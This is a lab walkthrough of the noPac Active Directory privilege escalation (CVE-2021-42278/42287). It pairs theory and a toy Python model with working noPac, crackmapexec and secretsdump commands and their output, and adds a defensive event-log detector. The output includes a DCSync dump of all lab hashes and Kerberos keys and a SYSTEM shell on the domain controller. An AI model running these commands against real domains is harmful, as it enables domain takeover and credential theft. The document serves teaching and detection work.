From Linux with noPac.py

Theory

In November 2021, two vulnerabilities caught the attention of many security researchers as they could allow domain escalation from a standard user.

CVE-2021-42278 - Name impersonation

Computer accounts should have a trailing $ in their name (i.e. sAMAccountName attribute) but no validation process existed to make sure of it. Abused in combination with CVE-2021-42287, it allowed attackers to impersonate domain controller accounts.

CVE-2021-42287 - KDC bamboozling

When requesting a service ticket, a TGT must be presented first. If the client principal named in that TGT is not found by the KDC, the KDC automatically searches again with a trailing $. So if a TGT is obtained for bob, and the bob account is then removed (or renamed), using that TGT to request a service ticket to itself on behalf of another user (S4U2self) makes the KDC look for bob$ in AD. If the domain controller account bob$ exists, bob (the user) just obtained a service ticket for bob$ (the domain controller account) as any user of his choosing, a domain admin included 🤯.

Machine Account

The ability to edit a machine account's sAMAccountName and servicePrincipalName attributes is a requirement for the attack chain. The easiest way to get it is to create a computer account (e.g. by leveraging the MachineAccountQuota domain-level attribute, 10 by default, if it's greater than 0): the creator of a machine account has enough privileges to edit those attributes on it. Alternatively, taking control of the owner/creator of an existing computer account does the job.

The attack can then be conducted as follows.

  1. Clear the controlled machine account servicePrincipalName attribute of any value that points to its name (e.g. host/machine.domain.local, RestrictedKrbHost/machine.domain.local)

  2. Change the controlled machine account sAMAccountName to a Domain Controller's name without the trailing $ -> CVE-2021-42278

  3. Request a TGT for the controlled machine account

  4. Reset the controlled machine account sAMAccountName to its old value (or anything else different than the Domain Controller's name without the trailing $)

  5. Request a service ticket with S4U2self by presenting the TGT obtained before -> CVE-2021-42287

  6. Get access to the domain controller with the resulting ticket (e.g. DCSync, or a shell on the DC)
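Here is an added example (not code from noPac, impacket, or the original page) that models the two bugs and the six steps above against a toy directory and KDC, so the interplay between the rename and the retry-with-$ lookup is visible without a lab. The account names, SIDs and the DC name NYC$ are constructed; the Directory and KDC classes are deliberate simplifications (no crypto, no real PAC structure), and the two `patched` flags stand in for the November 2021 fixes (sAMAccountName validation on computer objects, and the PAC_REQUESTOR check on the TGT).

```python
# Added example: toy model of CVE-2021-42278 / CVE-2021-42287 and the six-step
# chain. Not code from noPac or impacket; Directory and KDC are simplified
# stand-ins for AD and a Kerberos KDC (no crypto, no real PAC structure).
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Account:
    sam: str                      # sAMAccountName
    sid: str                      # objectSid (constructed values below)
    is_computer: bool
    spns: list = field(default_factory=list)   # servicePrincipalName values


@dataclass
class Ticket:
    cname: str                    # client principal name written into the ticket
    requester_sid: Optional[str]  # PAC_REQUESTOR buffer: only set by a patched KDC
    service: Optional[str] = None # for a service ticket: the account it is valid for


class Directory:
    """Minimal AD: unique sAMAccountName, rename rules, optional 42278 fix."""

    def __init__(self, patched: bool):
        self.patched = patched
        self.accounts = {}        # lower-cased sAMAccountName -> Account

    def add(self, acct: Account) -> None:
        self.accounts[acct.sam.lower()] = acct

    def find(self, sam: str) -> Optional[Account]:
        return self.accounts.get(sam.lower())

    def rename(self, old: str, new: str) -> None:
        acct = self.find(old)
        if acct is None or self.find(new) is not None:
            raise ValueError("no such account, or name already in use")
        # SPNs that still carry the old host name make the rename fail with a
        # constraint violation; that is why step 1 clears them (simplified check).
        base = old.rstrip("$").lower()
        if any(base in spn.lower() for spn in acct.spns):
            raise ValueError("constraintViolation: SPNs still reference the old name")
        # CVE-2021-42278 fix: a computer object must keep its trailing '$'.
        if self.patched and acct.is_computer and not new.endswith("$"):
            raise ValueError("constraintViolation: computer sAMAccountName must end with $")
        del self.accounts[old.lower()]
        acct.sam = new
        self.accounts[new.lower()] = acct


class KDC:
    """Minimal KDC: AS-REQ, and S4U2self with the retry-with-'$' lookup."""

    def __init__(self, directory: Directory, patched: bool):
        self.directory = directory
        self.patched = patched

    def as_req(self, sam: str) -> Ticket:
        acct = self.directory.find(sam)
        if acct is None:
            raise LookupError("KDC_ERR_C_PRINCIPAL_UNKNOWN")
        # CVE-2021-42287 fix: the TGT records which account it was issued to.
        return Ticket(cname=acct.sam, requester_sid=acct.sid if self.patched else None)

    def resolve_client(self, cname: str) -> Optional[Account]:
        acct = self.directory.find(cname)
        if acct is None and not cname.endswith("$"):
            acct = self.directory.find(cname + "$")   # the fallback that 42287 abuses
        return acct

    def s4u2self(self, tgt: Ticket, impersonate: str) -> Ticket:
        acct = self.resolve_client(tgt.cname)
        if acct is None:
            raise LookupError("KDC_ERR_C_PRINCIPAL_UNKNOWN")
        if self.patched and tgt.requester_sid != acct.sid:
            raise PermissionError("KDC_ERR_TGT_REVOKED: PAC_REQUESTOR does not match the account")
        # The service ticket is for acct's own service, as the impersonated user.
        return Ticket(cname=impersonate, requester_sid=tgt.requester_sid, service=acct.sam)


def run_chain(dir_patched: bool, kdc_patched: bool, clear_spns: bool = True) -> str:
    """Run steps 1-5 and return 'user -> service account' for the final ticket,
    or 'blocked: <reason>' for the first step that fails."""
    directory = Directory(dir_patched)
    kdc = KDC(directory, kdc_patched)
    directory.add(Account("NYC$", "S-1-5-21-1-2-3-1001", True, ["host/nyc.newyork.local"]))
    ours = Account("WIN-27AN50UBVJQ$", "S-1-5-21-1-2-3-1130", True,
                   ["host/WIN-27AN50UBVJQ.newyork.local"])
    directory.add(ours)
    try:
        if clear_spns:
            ours.spns.clear()                             # step 1
        directory.rename("WIN-27AN50UBVJQ$", "nyc")       # step 2 (CVE-2021-42278)
        tgt = kdc.as_req("nyc")                           # step 3
        directory.rename("nyc", "WIN-27AN50UBVJQ$")       # step 4
        st = kdc.s4u2self(tgt, "Administrator")           # step 5 (CVE-2021-42287)
    except (ValueError, LookupError, PermissionError) as exc:
        return f"blocked: {exc}"
    return f"{st.cname} -> {st.service}"                  # step 6 uses this ticket


if __name__ == "__main__":
    for flags in ((False, False), (True, False), (False, True)):
        print(flags, run_chain(*flags))
```

Running the three combinations shows where each fix bites: with nothing patched the chain ends with a ticket for Administrator to NYC$; with the directory fix, step 2 is refused; with only the KDC fix, steps 2-4 still work but S4U2self is refused because the TGT was issued to a different SID than the account the KDC resolved. Skipping step 1 (`clear_spns=False`) fails at step 2 with the constraint violation the SPNs cause.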

Check whether the user is allowed to create a new computer account (MachineAccountQuota)

crackmapexec ldap nyc.newyork.local -u Donald.Trump -p MaKeam3ricaGr3at -d newyork.local -M MAQ

Download noPac.py

mkdir exploiting_users
git clone https://github.com/Ridter/noPac.git
cd noPac

Scanning to check whether the DC is vulnerable. scanner.py requests a TGT with and without a PAC; if the PAC-less ticket is noticeably smaller (here 731 vs 1536 bytes), the KDC still honours PAC-less requests, which is a sign the DC is unpatched.

python3 scanner.py newyork.local/Donald.Trump:MaKeam3ricaGr3at -dc-ip 192.168.56.10  

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
                                           
                                        
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Got TGT with PAC from 192.168.56.10. Ticket size 1536
[*] Got TGT from 192.168.56.10. Ticket size 731
                                                

Dumping Dumping Dumping Love love

Getting the ccache. noPac.py runs the whole chain for us: it creates a computer account, renames it to the DC's name (nyc), gets a TGT for it, renames it back, requests an S4U2self ticket as Administrator, saves that ticket to a ccache file and deletes the computer account again.

python3 noPac.py newyork.local/Donald.Trump:MaKeam3ricaGr3at -dc-ip 192.168.56.10 --impersonate Administrator        

[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target nyc.newyork.local
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-27AN50UBVJQ$"
[*] MachineAccount "WIN-27AN50UBVJQ$" password = 2Jl*Fv6x)K#S
[*] Successfully added machine account WIN-27AN50UBVJQ$ with password 2Jl*Fv6x)K#S.
[*] WIN-27AN50UBVJQ$ object = CN=WIN-27AN50UBVJQ,CN=Computers,DC=newyork,DC=local
[*] WIN-27AN50UBVJQ$ sAMAccountName == nyc
[*] Saving a DC's ticket in nyc.ccache
[*] Reseting the machine account to WIN-27AN50UBVJQ$
[*] Restored WIN-27AN50UBVJQ$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_nyc.newyork.local.ccache
[*] Attempting to del a computer with the name: WIN-27AN50UBVJQ$
[*] Delete computer WIN-27AN50UBVJQ$ successfully!
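The run above is noisy on the DC side: the same user creates a computer account, renames it to a name without a trailing $, renames it back and deletes it, all within seconds. As an added example (not part of noPac or the original page), here is a small detector over the Security log events that sequence generates. Event IDs 4741 (computer account created), 4781 (account name changed) and 4743 (computer account deleted) and their field names are real; the records in SAMPLE_EVENTS are constructed to mirror the run above, not an export from a DC, and the DC_ACCOUNTS set is an assumption about the lab domain.

```python
# Added example (not part of noPac): a small detector for the trace the run
# above leaves in the domain controller's Security log. Event IDs 4741
# (computer account created), 4781 (account name changed) and 4743 (computer
# account deleted) are real Windows IDs with their real field names; the
# event records in SAMPLE_EVENTS are constructed, not an export from a DC.
from datetime import datetime, timedelta

# Assumption: the set of DC computer accounts in the domain (here only NYC$).
DC_ACCOUNTS = {"NYC$"}

SAMPLE_EVENTS = [   # constructed, mirroring the noPac.py run above
    {"EventID": 4741, "Time": "2022-03-01T10:00:01", "SubjectUserName": "Donald.Trump",
     "TargetUserName": "WIN-27AN50UBVJQ$"},
    {"EventID": 4781, "Time": "2022-03-01T10:00:02", "SubjectUserName": "Donald.Trump",
     "OldTargetUserName": "WIN-27AN50UBVJQ$", "NewTargetUserName": "nyc"},
    {"EventID": 4781, "Time": "2022-03-01T10:00:03", "SubjectUserName": "Donald.Trump",
     "OldTargetUserName": "nyc", "NewTargetUserName": "WIN-27AN50UBVJQ$"},
    {"EventID": 4743, "Time": "2022-03-01T10:00:04", "SubjectUserName": "Donald.Trump",
     "TargetUserName": "WIN-27AN50UBVJQ$"},
    # benign: an admin renames a workstation, the '$' stays
    {"EventID": 4781, "Time": "2022-03-01T10:05:00", "SubjectUserName": "vagrant",
     "OldTargetUserName": "WS01$", "NewTargetUserName": "WS02$"},
]


def detect(events, dc_accounts=DC_ACCOUNTS, window=timedelta(minutes=5)):
    """Return a list of alerts for (a) computer accounts renamed to a name
    without the trailing '$' (CVE-2021-42278 pattern; names the DC it collides
    with, if any) and (b) computer accounts created and deleted by the same
    subject within `window` (the noPac.py create/abuse/delete lifecycle)."""
    alerts = []
    created = {}      # (subject, computer name) -> creation time
    for ev in sorted(events, key=lambda e: e["Time"]):
        when = datetime.fromisoformat(ev["Time"])
        eid = ev["EventID"]
        subject = ev.get("SubjectUserName", "?")
        if eid == 4781:
            old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
            if old.endswith("$") and not new.endswith("$"):
                collides = (new + "$").upper()
                alerts.append({
                    "rule": "computer-renamed-without-dollar",
                    "time": ev["Time"], "subject": subject, "old": old, "new": new,
                    "impersonated_dc": collides if collides in dc_accounts else None,
                })
        elif eid == 4741:
            created[(subject, ev["TargetUserName"].upper())] = when
        elif eid == 4743:
            key = (subject, ev["TargetUserName"].upper())
            born = created.pop(key, None)
            if born is not None and when - born <= window:
                alerts.append({
                    "rule": "computer-created-then-deleted",
                    "time": ev["Time"], "subject": subject, "target": key[1],
                    "seconds": (when - born).total_seconds(),
                })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The first rule fires on the rename to nyc and resolves it to NYC$; the rename back (old name without $, new name with $) and the benign WS01$ to WS02$ rename do not fire. The second rule needs both the creation and the deletion by the same subject inside the window, three seconds here. These events are only logged when the "Audit Computer Account Management" and "Audit User Account Management" subcategories are enabled on the DC.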

Using the ccache. The file name must match exactly what noPac.py printed (Linux file names are case-sensitive, and the tool wrote Administrator_nyc.newyork.local.ccache); check the result with klist before going on.

export KRB5CCNAME=/home/kali/noPac/Administrator_nyc.newyork.local.ccache

Dumping love. With the Administrator ticket in KRB5CCNAME, secretsdump.py authenticates with Kerberos (-k -no-pass) and pulls the DC's SAM, LSA secrets and, through DRSUAPI (DCSync), every hash and Kerberos key in NTDS.DIT.

secretsdump.py -k -no-pass -dc-ip 'nyc.newyork.local' @'nyc.newyork.local' 

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3a13b607b6a98cfaa24f28f7b87f8eaa
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
newyork\NYC$:plain_password_hex:0d3ca87af7a6b6582d328d9a339d3f08e26db92b364cbf1f22ff65cd8a7c21c5df23653efc2282d305816c9b931ade47cd06b2b64f095e3ee1f5a3a838a51c10a274344fbf385f73d33ad6048ee8279b02e2874bec3f9cb14248e852e334f96754e6c2d41d1111f5c3ce3539ffc0f740fb5df47ee3c87842d9fce41420b94ef81ad2ca4d7c74e60e1d34b7b329076e717ea2a33b8dddcd67f599bdcaf00be843cf53965a4dd22a0c73373ada1e217076270a49616a770f25598dec51f0066ffcb4857859979244e49463bd687c4eae672bafb15adf96198f67f5ad1a82b77ec63b8b5d78601f7d87ca22945f1bdea512
newyork\NYC$:aad3b435b51404eeaad3b435b51404ee:0a38be3c64921d206de05e782d09edb0:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xd673ff2efdb16b8755b3850c4a1dbe0ba64076a4
dpapi_userkey:0xf04ccfc9e2d558b843a92950ec2c2b5e67f2f8ba
[*] NL$KM 
 0000   22 34 01 76 01 70 30 93  88 A7 6B B2 87 43 59 69   "4.v.p0...k..CYi
 0010   0E 41 BD 22 0A 0C CC 23  3A 5B B6 74 CB 90 D6 35   .A."...#:[.t...5
 0020   14 CA D8 45 4A F0 DB 72  D5 CF 3B A1 ED 7F 3A 98   ...EJ..r..;...:.
 0030   CD 4D D6 36 6A 35 24 2D  A0 EB 0F 8E 3F 52 81 C9   .M.6j5$-....?R..
NL$KM:223401760170309388a76bb2874359690e41bd220a0ccc233a5bb674cb90d63514cad8454af0db72d5cf3ba1ed7f3a98cd4dd6366a35242da0eb0f8e3f5281c9
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9bd3def911c72eaa484fc6a302f3a08b:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
Donald.Trump:1113:aad3b435b51404eeaad3b435b51404ee:5c4af7d7a0e3091678e947c3ed151b81:::
hugo.Chavez:1114:aad3b435b51404eeaad3b435b51404ee:12e3795b7dedb3bb741f2e2869616080:::
mateo.Pacheco:1115:aad3b435b51404eeaad3b435b51404ee:1ff4aa72d776c5834ba4893ab192f016:::
nicolas.Maduro:1116:aad3b435b51404eeaad3b435b51404ee:b3b3717f7d51b37fb325f7e7d048e998:::
marco.Lopez:1117:aad3b435b51404eeaad3b435b51404ee:9029cf007326107eb1c519c84ea60dbe:::
ramon.Maldonado:1118:aad3b435b51404eeaad3b435b51404ee:f2477a144dff4f216ab81f2ac3e3207d:::
rafael.Smith:1119:aad3b435b51404eeaad3b435b51404ee:1e9ed4fc99088768eed631acfcd49bce:::
diego.Montenegro:1120:aad3b435b51404eeaad3b435b51404ee:af41d274ce3ba74423fbe596cf944710:::
lorenzo.Cruz:1121:aad3b435b51404eeaad3b435b51404ee:6c439acfa121a821552568b086c8d210:::
jesus.Puello:1122:aad3b435b51404eeaad3b435b51404ee:2c1854ada028754e5d16113cab23fe5d:::
martin.Osuna:1123:aad3b435b51404eeaad3b435b51404ee:02166150bda700bc7be38198179b20fc:::
NYC$:1001:aad3b435b51404eeaad3b435b51404ee:0a38be3c64921d206de05e782d09edb0:::
NORTH$:1104:aad3b435b51404eeaad3b435b51404ee:59f1453dcd3f2fdc8c52f38693806154:::
maryland$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:bdb1a615bc9d82d2ab21f09f11baaef4bc66c48efdd56424e1206e581e4dd827
Administrator:aes128-cts-hmac-sha1-96:0c72a36a70f696fbee13a25fd3412d43
Administrator:des-cbc-md5:7f2cd0836164e592
krbtgt:aes256-cts-hmac-sha1-96:4860355d58ab70fb7446b46de1e21a430ff34234bda82c2498976f59cb5a7b48
krbtgt:aes128-cts-hmac-sha1-96:c1898a4681f6db2818eab08ef53c381c
krbtgt:des-cbc-md5:0b0e02f798cd6eef
vagrant:aes256-cts-hmac-sha1-96:aa97635c942315178db04791ffa240411c36963b5a5e775e785c6bd21dd11c24
vagrant:aes128-cts-hmac-sha1-96:0d7c6160ffb016857b9af96c44110ab1
vagrant:des-cbc-md5:16dc9e8ad3dfc47f
Donald.Trump:aes256-cts-hmac-sha1-96:cb90153b8e84ebdede218c3fa9e7b0114d5b70b1735794eeb6cb10c3df86bf03
Donald.Trump:aes128-cts-hmac-sha1-96:98f19974c1e949670c9748f0e3a19145
Donald.Trump:des-cbc-md5:3875f4ba255198f2
hugo.Chavez:aes256-cts-hmac-sha1-96:482b83d108ab34176b2a839e41586b8a57b7c6715b0e26be90921188df0a27ff
hugo.Chavez:aes128-cts-hmac-sha1-96:4a85ba8bfde521b8a810dbfbd98ea751
hugo.Chavez:des-cbc-md5:c875e56110b07a9b
mateo.Pacheco:aes256-cts-hmac-sha1-96:3403436d003b92dffbe780d0e38b7c1ac4907396bc3008c17b68bc8e2bba2e07
mateo.Pacheco:aes128-cts-hmac-sha1-96:6a25e4122c1b1be9f09baf2c4a067207
mateo.Pacheco:des-cbc-md5:64da85f72a73804c
nicolas.Maduro:aes256-cts-hmac-sha1-96:697e05087154fa16c453e446d86eff4b0124ea9b66ead10c95350e23fa350fc9
nicolas.Maduro:aes128-cts-hmac-sha1-96:32b65f1fd540633a3c4e8a2af61b2172
nicolas.Maduro:des-cbc-md5:38f458256b866eea
marco.Lopez:aes256-cts-hmac-sha1-96:df994eed7edaf8c98a53737d82e67444eccdac084ddd46a856caa33442b988a3
marco.Lopez:aes128-cts-hmac-sha1-96:08f18af47f3bf7a596ce32b43cf8c048
marco.Lopez:des-cbc-md5:34b02f0d5432ad92
ramon.Maldonado:aes256-cts-hmac-sha1-96:52ab5589df5e392653cf85f187734169bd790c3d494c6d4afb155a50f5044ccb
ramon.Maldonado:aes128-cts-hmac-sha1-96:4c5b542e7892582746a4c8859e89e463
ramon.Maldonado:des-cbc-md5:b5cbe9dcfb854f0e
rafael.Smith:aes256-cts-hmac-sha1-96:308f3818f4b13d299b142dfd9b64ea7e18141cd8799f5b276d8ad668a93b0d55
rafael.Smith:aes128-cts-hmac-sha1-96:e77e9d15a15f93d27941f0a5c9b83e54
rafael.Smith:des-cbc-md5:9e5e9b3b670da797
diego.Montenegro:aes256-cts-hmac-sha1-96:c76fd032ca861dcf0816dbd7da32581f18c3e93168357d3cdc1f1f6917d22be2
diego.Montenegro:aes128-cts-hmac-sha1-96:fd38c66b17c5506fc7a748ed5d9025da
diego.Montenegro:des-cbc-md5:3ed68f9429625879
lorenzo.Cruz:aes256-cts-hmac-sha1-96:629162d8463f6686e1f8245e8706d358c7844883dea03f3c689ba103ebefb999
lorenzo.Cruz:aes128-cts-hmac-sha1-96:100012bed065340c357e06def2cda4a6
lorenzo.Cruz:des-cbc-md5:2c31583d430d94e0
jesus.Puello:aes256-cts-hmac-sha1-96:a311ddc97a776dd51751455d4d4642cd9831cba5486ebdcf160bddcd058190d6
jesus.Puello:aes128-cts-hmac-sha1-96:d084b847cedaef57f3af254eee399205
jesus.Puello:des-cbc-md5:4c026b26a4dcdcfd
martin.Osuna:aes256-cts-hmac-sha1-96:f372506351df0a3620c8e0e77fc5efbc53b02699edee87a6d7b8d3007b3dd524
martin.Osuna:aes128-cts-hmac-sha1-96:51e74907a4d3cfce080d19eb02847685
martin.Osuna:des-cbc-md5:1ada4fcec273b9e6
NYC$:aes256-cts-hmac-sha1-96:ab4c2384afa3b1bce4947297088871e97bf546c4eabfee82e726c97c11d118b6
NYC$:aes128-cts-hmac-sha1-96:be559494ce4e842ab4ce508aa86370f3
NYC$:des-cbc-md5:8034974fe07a10a4
NORTH$:aes256-cts-hmac-sha1-96:7a2c03c56595fc285d4573df462b20c187118d10c91508fc188605dbf3c40d30
NORTH$:aes128-cts-hmac-sha1-96:ab3de201f07d56372fec8b4fa5d28afc
NORTH$:des-cbc-md5:6858ae1acec7d6d3
maryland$:aes256-cts-hmac-sha1-96:c5660c1cd2d309d6d3c109223d5d9d7d81fdc9a34b6568df7cf78ed169e2030a
maryland$:aes128-cts-hmac-sha1-96:9d492c71d4a716fa56ec386d8f732f9e
maryland$:des-cbc-md5:9897a46b76255815

Exploiting and getting a shell. The -dc-host value must be the DC that the ticket was obtained for (the tool prints a reminder about this).

python3 noPac.py newyork.local/Donald.Trump:MaKeam3ricaGr3at -dc-host nyc -just-dc-ntlm --impersonate Administrator -shell

[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target nyc.newyork.local
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-LXRB5OUWKFP$"
[*] MachineAccount "WIN-LXRB5OUWKFP$" password = Oykv^)T@zb&j
[*] Successfully added machine account WIN-LXRB5OUWKFP$ with password Oykv^)T@zb&j.
[*] WIN-LXRB5OUWKFP$ object = CN=WIN-LXRB5OUWKFP,CN=Computers,DC=newyork,DC=local
[*] WIN-LXRB5OUWKFP$ sAMAccountName == nyc
[*] Saving a DC's ticket in nyc.ccache
[*] Reseting the machine account to WIN-LXRB5OUWKFP$
[*] Restored WIN-LXRB5OUWKFP$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_nyc.newyork.local.ccache
[*] Attempting to del a computer with the name: WIN-LXRB5OUWKFP$
[*] Delete computer WIN-LXRB5OUWKFP$ successfully!
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
NYC

Cleanup cleanup, everybody let's cleanup. In both runs above noPac.py already deleted the computer account it created ("Delete computer ... successfully!"). If that deletion fails, or the chain was run by hand, delete the account with addcomputer.py, replacing samaccountname$ with the name that was created (e.g. WIN-27AN50UBVJQ$):

addcomputer.py -computer-name 'samaccountname$' -delete -dc-host nyc.newyork.local -domain-netbios NEWYORK -hashes 'aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e' 'newyork.local/Administrator'
